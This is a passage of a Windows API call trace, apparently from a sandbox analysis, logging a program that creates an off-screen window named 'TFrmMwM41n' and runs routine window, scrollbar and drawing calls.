hInstance=0x5fc0000, lpClassName="TFrmMwM41n", lpWndClass=0x534f634 | out: lpWndClass=0x534f634) returned 0 [0281.701] RegisterClassW (lpWndClass=0x534f680) returned 0xc0f4 [0281.701] CreateWindowExW (dwExStyle=0x10000, lpClassName="TFrmMwM41n", lpWindowName="FrmMwM41n", dwStyle=0x6cf0000, X=-452, Y=-452, nWidth=320, nHeight=240, hWndParent=0x10110, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10134 [0281.701] IsWindowUnicode (hWnd=0x10134) returned 1 [0281.701] SetWindowLongW (hWnd=0x10134, nIndex=-4, dwNewLong=54661064) returned 101382728 [0281.701] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.702] SetPropW (hWnd=0x10134, lpString=0xc02f, hData=0x62f13c0) returned 1 [0281.702] SetPropW (hWnd=0x10134, lpString=0xc02e, hData=0x62f13c0) returned 1 [0281.702] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x24, wParam=0x0, lParam=0x534f0c0) returned 0x0 [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x81, wParam=0x0, lParam=0x534f09c) returned 0x1 [0281.702] SetMenu (hWnd=0x10134, hMenu=0x0) returned 1 [0281.702] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x46, wParam=0x0, lParam=0x534ecc4) returned 0x0 [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] GetCurrentThreadId () returned 0x62c [0281.702] GetCurrentThreadId () returned 0x62c [0281.703] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x83, wParam=0x1, lParam=0x534ec98) returned 0x0 [0281.703] GetCurrentThreadId () returned 0x62c [0281.703] GetCurrentThreadId () returned 0x62c [0281.703] GetCurrentThreadId () returned 0x62c [0281.703] GetCurrentThreadId () returned 0x62c [0281.703] GetCurrentThreadId () returned 0x62c [0281.703] GetCurrentThreadId () returned 0x62c [0281.703] IsIconic (hWnd=0x10134) returned 0 [0281.703] GetWindowRect (in: hWnd=0x10134, lpRect=0x534e930 | out: lpRect=0x534e930) returned 1 [0281.703] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.703] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x47, wParam=0x0, lParam=0x534ecc4) returned 0x0 [0281.704] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x3, wParam=0x0, lParam=0xfe5afe44) returned 0x0 [0281.704] IsIconic (hWnd=0x10134) returned 0 [0281.704] GetWindowRect (in: hWnd=0x10134, lpRect=0x534e400 | out: lpRect=0x534e400) returned 1 [0281.704] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.704] GetCurrentThreadId () returned 0x62c [0281.704] GetCurrentThreadId () returned 0x62c [0281.704] GetCurrentThreadId () returned 0x62c [0281.704] GetCurrentThreadId () returned 0x62c [0281.704] GetCurrentThreadId () returned 0x62c [0281.704] GetCurrentThreadId () returned 0x62c [0281.704] IsIconic (hWnd=0x10134) returned 0 [0281.704] GetWindowRect (in: hWnd=0x10134, lpRect=0x534e3dc | out: lpRect=0x534e3dc) returned 1 [0281.704] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.704] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x5, wParam=0x0, lParam=0xca0130) returned 0x0 [0281.704] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534e40c, fWinIni=0x0 | out: pvParam=0x534e40c) returned 1 [0281.704] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.704] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.704] IsIconic (hWnd=0x10134) returned 0 [0281.704] GetClientRect (in: hWnd=0x10134, lpRect=0x534e3f0 | out: lpRect=0x534e3f0) returned 1 [0281.704] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.704] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.704] IsIconic (hWnd=0x10134) returned 0 [0281.704] GetClientRect (in: hWnd=0x10134, lpRect=0x534e3f0 | out: lpRect=0x534e3f0) returned 1 [0281.704] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.704] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.704] IsIconic (hWnd=0x10134) returned 0 [0281.704] GetClientRect (in: hWnd=0x10134, lpRect=0x534e3c0 | out: lpRect=0x534e3c0) returned 1 [0281.704] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.705] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.705] IsIconic (hWnd=0x10134) returned 0 [0281.705] GetClientRect (in: hWnd=0x10134, lpRect=0x534e3c0 | out: lpRect=0x534e3c0) returned 1 [0281.705] FlatSB_SetScrollProp (param_1=0x10134, index=0x100, newValue=0x0, param_4=0) returned 0 [0281.705] GetSysColor (nIndex=20) returned 0xffffff [0281.705] FlatSB_SetScrollProp (param_1=0x10134, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0281.705] FlatSB_SetScrollInfo (param_1=0x10134, code=1, psi=0x534e3fc, fRedraw=1) returned 0 [0281.705] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0281.705] GetCurrentThreadId () returned 0x62c [0281.705] GetCurrentThreadId () returned 0x62c [0281.705] GetCurrentThreadId () returned 0x62c [0281.705] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.706] GetCurrentThreadId () returned 0x62c [0281.707] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.707] IsIconic (hWnd=0x10134) returned 0 [0281.707] GetClientRect (in: hWnd=0x10134, lpRect=0x534e3c0 | out: lpRect=0x534e3c0) returned 1 [0281.707] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.707] IsIconic (hWnd=0x10134) returned 0 [0281.707] GetClientRect (in: hWnd=0x10134, lpRect=0x534e3c0 | out: lpRect=0x534e3c0) returned 1 [0281.707] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.707] IsIconic (hWnd=0x10134) returned 0 [0281.707] GetClientRect (in: hWnd=0x10134, lpRect=0x534e3c0 | out: lpRect=0x534e3c0) returned 1 [0281.707] FlatSB_SetScrollProp (param_1=0x10134, index=0x200, newValue=0x0, param_4=0) returned 0 [0281.707] GetSysColor (nIndex=20) returned 0xffffff [0281.707] FlatSB_SetScrollProp (param_1=0x10134, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0281.707] FlatSB_SetScrollInfo (param_1=0x10134, code=0, psi=0x534e3fc, fRedraw=1) returned 0 [0281.717] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.717] IsIconic (hWnd=0x10134) returned 0 [0281.717] GetClientRect (in: hWnd=0x10134, lpRect=0x534e3c0 | out: lpRect=0x534e3c0) returned 1 [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.717] GetCurrentThreadId () returned 0x62c [0281.718] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x83, wParam=0x1, lParam=0x534e8c0) returned 0x0 [0281.718] GetCurrentThreadId () returned 0x62c [0281.718] GetCurrentThreadId () returned 0x62c [0281.718] GetCurrentThreadId () returned 0x62c [0281.718] GetCurrentThreadId () returned 0x62c [0281.718] GetCurrentThreadId () returned 0x62c [0281.718] GetCurrentThreadId () returned 0x62c [0281.719] GetSystemMenu (hWnd=0x10134, bRevert=0) returned 0x10153 [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x83, wParam=0x0, lParam=0x534f0e0) returned 0x0 [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] GetCurrentThreadId () returned 0x62c [0281.719] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x1, wParam=0x0, lParam=0x534f080) returned 0x0 [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetWindowLongW (hWnd=0x10134, nIndex=-20) returned 65792 [0281.720] SetWindowLongW (hWnd=0x10134, nIndex=-20, dwNewLong=65792) returned 65792 [0281.720] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x7c, wParam=0xffffffec, lParam=0x534f490) returned 0x0 [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] GetCurrentThreadId () returned 0x62c [0281.720] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x7d, wParam=0xffffffec, lParam=0x534f490) returned 0x0 [0281.721] GetCurrentThreadId () returned 0x62c [0281.721] GetCurrentThreadId () returned 0x62c [0281.721] GetCurrentThreadId () returned 0x62c [0281.721] GetCurrentThreadId () returned 0x62c [0281.721] GetCurrentThreadId () returned 0x62c [0281.721] GetCurrentThreadId () returned 0x62c [0281.721] RedrawWindow (hWnd=0x10134, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x485) returned 1 [0281.721] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.721] IsIconic (hWnd=0x10134) returned 0 [0281.721] GetWindowRect (in: hWnd=0x10134, lpRect=0x534f5c4 | out: lpRect=0x534f5c4) returned 1 [0281.721] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.721] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x30, wParam=0xb0a0227, lParam=0x1) returned 0x0 [0281.721] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.721] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.721] IsIconic (hWnd=0x10134) returned 0 [0281.721] GetClientRect (in: hWnd=0x10134, lpRect=0x534f6e0 | out: lpRect=0x534f6e0) returned 1 [0281.721] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.721] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.721] IsIconic (hWnd=0x10134) returned 0 [0281.721] GetClientRect (in: hWnd=0x10134, lpRect=0x534f6e0 | out: lpRect=0x534f6e0) returned 1 [0281.721] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.721] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.721] IsIconic (hWnd=0x10134) returned 0 [0281.721] GetClientRect (in: hWnd=0x10134, lpRect=0x534f6b0 | out: lpRect=0x534f6b0) returned 1 [0281.721] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.721] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.721] IsIconic (hWnd=0x10134) returned 0 [0281.721] GetClientRect (in: hWnd=0x10134, lpRect=0x534f6b0 | out: lpRect=0x534f6b0) returned 1 [0281.721] FlatSB_SetScrollProp (param_1=0x10134, index=0x100, newValue=0x0, param_4=0) returned 0 [0281.721] GetSysColor (nIndex=20) returned 0xffffff [0281.722] FlatSB_SetScrollProp (param_1=0x10134, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0281.722] FlatSB_SetScrollInfo (param_1=0x10134, code=1, psi=0x534f6ec, fRedraw=1) returned 0 [0281.723] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.723] IsIconic (hWnd=0x10134) returned 0 [0281.723] GetClientRect (in: hWnd=0x10134, lpRect=0x534f6b0 | out: lpRect=0x534f6b0) returned 1 [0281.723] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.723] IsIconic (hWnd=0x10134) returned 0 [0281.723] GetClientRect (in: hWnd=0x10134, lpRect=0x534f6b0 | out: lpRect=0x534f6b0) returned 1 [0281.723] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.723] IsIconic (hWnd=0x10134) returned 0 [0281.723] GetClientRect (in: hWnd=0x10134, lpRect=0x534f6b0 | out: lpRect=0x534f6b0) returned 1 [0281.723] FlatSB_SetScrollProp (param_1=0x10134, index=0x200, newValue=0x0, param_4=0) returned 0 [0281.723] GetSysColor (nIndex=20) returned 0xffffff [0281.723] FlatSB_SetScrollProp (param_1=0x10134, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0281.723] FlatSB_SetScrollInfo (param_1=0x10134, code=0, psi=0x534f6ec, fRedraw=1) returned 0 [0281.724] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.724] IsIconic (hWnd=0x10134) returned 0 [0281.724] GetClientRect (in: hWnd=0x10134, lpRect=0x534f6b0 | out: lpRect=0x534f6b0) returned 1 [0281.724] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0281.724] SendMessageW (hWnd=0x10134, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0281.724] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0281.725] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x10136 [0281.725] GetCurrentThreadId () returned 0x62c [0281.725] GetCurrentThreadId () returned 0x62c [0281.725] GetCurrentThreadId () returned 0x62c [0281.725] GetCurrentThreadId () returned 0x62c [0281.725] GetCurrentThreadId () returned 0x62c [0281.725] GetCurrentThreadId () returned 0x62c [0281.727] GetCurrentThreadId () returned 0x62c [0281.727] GetCurrentThreadId () returned 0x62c [0281.727] GetCurrentThreadId () returned 0x62c [0281.727] GetCurrentThreadId () returned 0x62c [0281.727] GetCurrentThreadId () returned 0x62c [0281.727] GetCurrentThreadId () returned 0x62c [0281.727] SetPropW (hWnd=0x10134, lpString=0xc02f, hData=0x62f13c0) returned 1 [0281.727] SetPropW (hWnd=0x10134, lpString=0xc02e, hData=0x62f13c0) returned 1 [0281.727] GetCurrentThreadId () returned 0x62c [0281.727] GetCurrentThreadId () returned 0x62c [0281.727] GetDC (hWnd=0x10134) returned 0xc01016e [0281.727] GetCurrentThreadId () returned 0x62c [0281.727] MoveToEx (in: hdc=0xc01016e, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0281.727] SelectObject (hdc=0xc01016e, h=0xb0a0227) returned 0x18a002e [0281.727] GetSysColor (nIndex=8) returned 0x0 [0281.727] SetTextColor (hdc=0xc01016e, color=0x0) returned 0x0 [0281.727] GetTextExtentPoint32W (in: hdc=0xc01016e, lpString="0", c=1, psizl=0x534f7b4 | out: psizl=0x534f7b4) returned 1 [0281.728] IsIconic (hWnd=0x10134) returned 0 [0281.728] GetClientRect (in: hWnd=0x10134, lpRect=0x534f7a4 | out: lpRect=0x534f7a4) returned 1 [0281.728] IsIconic (hWnd=0x10134) returned 0 [0281.728] GetClientRect (in: hWnd=0x10134, lpRect=0x534f79c | out: lpRect=0x534f79c) returned 1 [0281.728] IsIconic (hWnd=0x10134) returned 0 [0281.728] SetWindowPos (hWnd=0x10134, hWndInsertAfter=0x0, X=-452, Y=-452, cx=194, cy=240, uFlags=0x14) returned 1 [0281.728] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x46, wParam=0x0, lParam=0x534f6f4) returned 0x0 [0281.728] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x24, wParam=0x0, lParam=0x534f124) returned 0x0 [0281.728] GetCurrentThreadId () returned 0x62c [0281.728] GetCurrentThreadId () returned 0x62c [0281.728] SelectObject (hdc=0xc01016e, h=0x1b00017) returned 0x1b00017 [0281.728] SelectObject (hdc=0xc01016e, h=0x1900015) returned 0x1900010 [0281.728] SelectObject (hdc=0xc01016e, h=0x18a002e) returned 0xb0a0227 [0281.728] GetCurrentPositionEx (in: hdc=0xc01016e, lppt=0x534ef58 | out: lppt=0x534ef58) returned 1 [0281.728] GetCurrentThreadId () returned 0x62c [0281.728] GetCurrentThreadId () returned 0x62c [0281.728] ReleaseDC (hWnd=0x10134, hDC=0xc01016e) returned 1 [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x83, wParam=0x1, lParam=0x534f6c8) returned 0x0 [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.729] GetCurrentThreadId () returned 0x62c [0281.730] IsWindowVisible (hWnd=0x10134) returned 0 [0281.730] IsIconic (hWnd=0x10134) returned 0 [0281.730] GetWindowRect (in: hWnd=0x10134, lpRect=0x534f360 | out: lpRect=0x534f360) returned 1 [0281.730] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.730] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x47, wParam=0x0, lParam=0x534f6f4) returned 0x0 [0281.730] IsIconic (hWnd=0x10134) returned 0 [0281.730] GetWindowRect (in: hWnd=0x10134, lpRect=0x534ee0c | out: lpRect=0x534ee0c) returned 1 [0281.730] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.730] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x5, wParam=0x0, lParam=0xca00b2) returned 0x0 [0281.730] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534ee3c, fWinIni=0x0 | out: pvParam=0x534ee3c) returned 1 [0281.730] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.730] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.730] IsIconic (hWnd=0x10134) returned 0 [0281.730] GetClientRect (in: hWnd=0x10134, lpRect=0x534ee20 | out: lpRect=0x534ee20) returned 1 [0281.730] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.730] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.730] IsIconic (hWnd=0x10134) returned 0 [0281.730] GetClientRect (in: hWnd=0x10134, lpRect=0x534ee20 | out: lpRect=0x534ee20) returned 1 [0281.730] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.730] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.731] IsIconic (hWnd=0x10134) returned 0 [0281.731] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.731] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.731] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.731] IsIconic (hWnd=0x10134) returned 0 [0281.731] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.731] FlatSB_SetScrollProp (param_1=0x10134, index=0x100, newValue=0x0, param_4=0) returned 0 [0281.731] GetSysColor (nIndex=20) returned 0xffffff [0281.731] FlatSB_SetScrollProp (param_1=0x10134, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0281.731] FlatSB_SetScrollInfo (param_1=0x10134, code=1, psi=0x534ee2c, fRedraw=1) returned 0 [0281.732] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.732] IsIconic (hWnd=0x10134) returned 0 [0281.732] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.732] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.732] IsIconic (hWnd=0x10134) returned 0 [0281.732] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.732] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.732] IsIconic (hWnd=0x10134) returned 0 [0281.732] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.732] FlatSB_SetScrollProp (param_1=0x10134, index=0x200, newValue=0x0, param_4=0) returned 0 [0281.732] GetSysColor (nIndex=20) returned 0xffffff [0281.732] FlatSB_SetScrollProp (param_1=0x10134, index=0x80, newValue=0xffffff, param_4=0) returned 0 [0281.732] FlatSB_SetScrollInfo (param_1=0x10134, code=0, psi=0x534ee2c, fRedraw=1) returned 0 [0281.733] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.733] IsIconic (hWnd=0x10134) returned 0 [0281.733] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.733] GetCurrentThreadId () returned 0x62c [0281.734] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x83, wParam=0x1, lParam=0x534f2f0) returned 0x0 [0281.734] GetCurrentThreadId () returned 0x62c [0281.734] GetCurrentThreadId () returned 0x62c [0281.734] GetCurrentThreadId () returned 0x62c [0281.734] GetCurrentThreadId () returned 0x62c [0281.734] GetCurrentThreadId () returned 0x62c [0281.734] GetCurrentThreadId () returned 0x62c [0281.735] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534f71c, fWinIni=0x0 | out: pvParam=0x534f71c) returned 1 [0281.735] IsIconic (hWnd=0x10134) returned 0 [0281.735] GetClientRect (in: hWnd=0x10134, lpRect=0x534f7a4 | out: lpRect=0x534f7a4) returned 1 [0281.735] IsIconic (hWnd=0x10134) returned 0 [0281.735] GetClientRect (in: hWnd=0x10134, lpRect=0x534f79c | out: lpRect=0x534f79c) returned 1 [0281.735] IsIconic (hWnd=0x10134) returned 0 [0281.735] SetWindowPos (hWnd=0x10134, hWndInsertAfter=0x0, X=-452, Y=-452, cx=194, cy=55, uFlags=0x14) returned 1 [0281.735] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x46, wParam=0x0, lParam=0x534f6f4) returned 0x0 [0281.735] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x24, wParam=0x0, lParam=0x534f124) returned 0x0 [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.735] GetCurrentThreadId () returned 0x62c [0281.736] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x83, wParam=0x1, lParam=0x534f6c8) returned 0x0 [0281.736] GetCurrentThreadId () returned 0x62c [0281.736] GetCurrentThreadId () returned 0x62c [0281.736] GetCurrentThreadId () returned 0x62c [0281.736] GetCurrentThreadId () returned 0x62c [0281.736] GetCurrentThreadId () returned 0x62c [0281.736] GetCurrentThreadId () returned 0x62c [0281.736] IsWindowVisible (hWnd=0x10134) returned 0 [0281.736] IsIconic (hWnd=0x10134) returned 0 [0281.736] GetWindowRect (in: hWnd=0x10134, lpRect=0x534f360 | out: lpRect=0x534f360) returned 1 [0281.736] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.736] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x47, wParam=0x0, lParam=0x534f6f4) returned 0x0 [0281.736] IsIconic (hWnd=0x10134) returned 0 [0281.736] GetWindowRect (in: hWnd=0x10134, lpRect=0x534ee0c | out: lpRect=0x534ee0c) returned 1 [0281.736] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.736] CallWindowProcW (lpPrevWndFunc=0x5fcfc8c, hWnd=0x10134, Msg=0x5, wParam=0x0, lParam=0x1100b2) returned 0x0 [0281.737] SystemParametersInfoW (in: uiAction=0x30, uiParam=0x0, pvParam=0x534ee3c, fWinIni=0x0 | out: pvParam=0x534ee3c) returned 1 [0281.737] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.737] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.737] IsIconic (hWnd=0x10134) returned 0 [0281.737] GetClientRect (in: hWnd=0x10134, lpRect=0x534ee20 | out: lpRect=0x534ee20) returned 1 [0281.737] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.737] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.737] IsIconic (hWnd=0x10134) returned 0 [0281.737] GetClientRect (in: hWnd=0x10134, lpRect=0x534ee20 | out: lpRect=0x534ee20) returned 1 [0281.737] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.737] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.737] IsIconic (hWnd=0x10134) returned 0 [0281.737] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.737] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.737] GetWindowLongW (hWnd=0x10134, nIndex=-16) returned 114229248 [0281.737] IsIconic (hWnd=0x10134) returned 0 [0281.737] GetClientRect (in: hWnd=0x10134, lpRect=0x534edf0 | out: lpRect=0x534edf0) returned 1 [0281.737] FlatSB_SetScrollProp (param_1=0x10134, index=0x100, newValue=0x0, param_4=0) returned 0 [0281.737] GetSysColor (nIndex=20) returned 0xffffff [0281.737] FlatSB_SetScrollProp (param_1=0x10134, index=0x40, newValue=0xffffff, param_4=0) returned 0 [0281.737] 